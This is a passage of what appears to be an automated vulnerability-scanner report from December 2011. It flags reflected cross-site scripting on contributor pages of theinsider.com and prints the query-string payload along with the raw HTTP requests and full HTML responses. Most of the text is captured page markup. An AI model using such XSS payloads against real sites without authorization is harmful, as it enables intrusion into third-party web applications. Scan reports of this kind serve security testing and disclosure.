d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/movies;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/movies;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/movies;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Movies+Channel+Page+http://insdr.co/nuF1qa+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/movies/movies.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/movies/"><img src="/media/img/channel_page_name_v3_movies.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/movies/46996_Cabin_in_the_Woods_trailer/index.html' class='black_text_link'><img src='/media/photo/2011/12/100323/cabin_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46996_Cabin_in_the_Woods_trailer/index.html' class='black_text_link horizontal_excerpt'>'Cabin' in the...Whoa!</a></h4><p>Joss Whedon's long-delayed <em>Cabin in the Woods</em> has taken on almost mythical proportions by this point as fans of both the <em>Buffy </em>creator and horror have heard this film is everything from &quot;a total genre recalibration&quot; to &quot;one of the most inventive horror movies ever made.&quot;</p><a target='_self' href='/movies/46996_Cabin_in_the_Woods_trailer/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='black_text_link'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='black_text_link horizontal_excerpt'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></h4><p>When Daniel Craig stripped down to that teeny mankini for 2006's <em>Casino Royale</em>, the paparazzi were sent into hyper-drive, which might be why D.C. only doffed his top in private for the the 2008 sequel.</p><a target='_self' href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/movies/46963_12_Must_See_December_Movies/index.html' class='black_text_link'><img src='/media/photo/2011/12/99944/416_thegirlwiththedragontattoo_111101_columbiapictures.JPG' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46963_12_Must_See_December_Movies/index.html' class='black_text_link horizontal_excerpt'>12 Must-See December Movies</a></h4><p>12 December movies you absolutely must see!</p><a target='_self' href='/movies/46963_12_Must_See_December_Movies/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/movies/46977_December_4_2011_box_office_Twilight_Muppets_Shame/index.html' class='black_text_link'><img src='/media/photo/2011/12/99912/shame_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46977_December_4_2011_box_office_Twilight_Muppets_Shame/index.html' class='black_text_link horizontal_excerpt'>NC-17 Rating Can't Stop 'Shame'</a></h4><p>The first mainstream NC-17 film to be released in years, Michael Fassbender's <em>Shame</em>, was the most eventful box office development during the second slowest week of 2011. Despite some of the most popular theater chains refusing to carry the explicit drama, <em>Shame </em><a target='_blank' href='http://www.hollywoodreporter.com/news/twilight-breaking-dawn-muppets-shame-box-office-269418'>scored</a> the week's highest per-theater average ($361,181..
- /contributor/keltie_colleen/index.html

/contributor/keltie_colleen/index.html

http://www.theinsider.com/contributor/keltie_colleen/index.html?'%22--%3E%3C/style%3E%3C/script%3E%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00097C)</script>

Request

GET /contributor/keltie_colleen/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:56:52 GMT
Content-Length: 12136
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Keltie Colleen Channel Page | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="contributor_keltie_colleen" /> <meta name="date" content="2011-10-21 16:36:00" /><meta property="og:title" content="Keltie Colleen Channel Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/contributor/keltie_colleen/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Keltie Colleen Channel Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 16:36:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/4249800758/insider_v3/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/swfobject.js" type="text/javascript" ></script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="js/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script type="text/javascript">$(window).load(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class='body keltie_colleen'><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><body class="body"> <div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/contributor_keltie_colleen;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/contributor_keltie_colleen;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/contributor_keltie_colleen;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Keltie+Colleen+Channel+Page+http://insdr.co/qkSMa1+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/contributor/contributor.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col1"> <div id='channel_title_bar' class='keltie_colleen'> <a href=''><img src='/media/img/channel_page_name_keltie_colleen.png' style='margin-left: 190px; margin-top: 0px;' alt='' /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'><img src='/media/photo/2011/12/100354/vid_keltie_416_111205.jpg' class='channel_vid_img' height='380' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'>Cody Simpson Talks Girls & Dolls!</a></h4></div><div class='vid_excerpt'><p>Last week the internet combusted with the rumor that Cody Simpson was dating Kylie Jenner, after the two were spotted together at The Grove.</p><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_keltie_colleen.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>gossip</span><a href='/gossip/47165_Idol_Winner_Named_New_Artist_of_the_Year/index.html'>'Idol' Winner Named New Artist of the Year</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/47164_Robert_Downey_Jr_s_Having_a/index.html'>Robert Downey Jr.'s Having a ... </a></li></ul></div><div class='clearfix'></div><div class='channelblock rightblock'><a target='_self' href='/music/46958_Javier_Colon_Exclusive_sneak_peek/index.html' class='black_text_link'><img src='/media/photo/2011/12/99956/keltie_colleen_javier_colon_416.jpg' height='380' width='640' class='channel_vid_img' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/46958_Javier_Colon_Exclusive_sneak_peek/index.html' class='black_text_link'>On the Set of Javier Colon's First Music Video!</a></h4></div><div class='vid_excerpt'><p>The first time I saw Javier Colon on <em>The Voice</em>, I knew he would win. There is just something about his voice that truly transcends any genre and give you goosebumps. On top of all of his vocal talents, Javier is also an incredibly nice guy. I found out just how wonderful when he invited me on the set for an exclusive behind the scenes look at his new music video featuring Natasha Bedingfield for <em>As Long As We Got Love</em>.</p><a target='_self' href='/music/46958_Javier_Colon_Exclusive_sneak_peek/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_keltie_colleen.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>Full Episode</span><a href='/full_episode/43329_Daily_Full_Episode/index.html'>Watch the Latest Full Episode</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html'>Celebs Hit Las Vegas [Pics]</a></li></ul></div><div class='clearfix'></div><div class='channelblock leftblock'><a target='_self' href='/music/46868_Hot_Chelle_Rae_Giveaway_and_interview/index.html' class='black_text_link'><img src='/media/photo/2011/11/99298/INS_KELTIE_HCRPIC_416.jpg' class='channel_vid_img' height='380' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music..
- /contributor/jarett_wieselman/index.html

/contributor/jarett_wieselman/index.html

http://www.theinsider.com/contributor/jarett_wieselman/index.html?'%22--%3E%3C/style%3E%3C/script%3E..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00094E)</script>

Request

GET /contributor/jarett_wieselman/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:56:49 GMT
Content-Length: 11619
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Jarett Wieselman Channel Page | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="contributor_jarett_wieselman" /> <meta name="date" content="2011-10-21 16:33:00" /><meta property="og:title" content="Jarett Wieselman Channel Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/contributor/jarett_wieselman/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Jarett Wieselman Channel Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 16:33:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/4249800758/insider_v3/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/swfobject.js" type="text/javascript" ></script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="js/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script type="text/javascript">$(window).load(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class='body jarett_wieselman'><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><body class="body"> <div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/contributor_jarett_wieselman;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/contributor_jarett_wieselman;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/contributor_jarett_wieselman;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

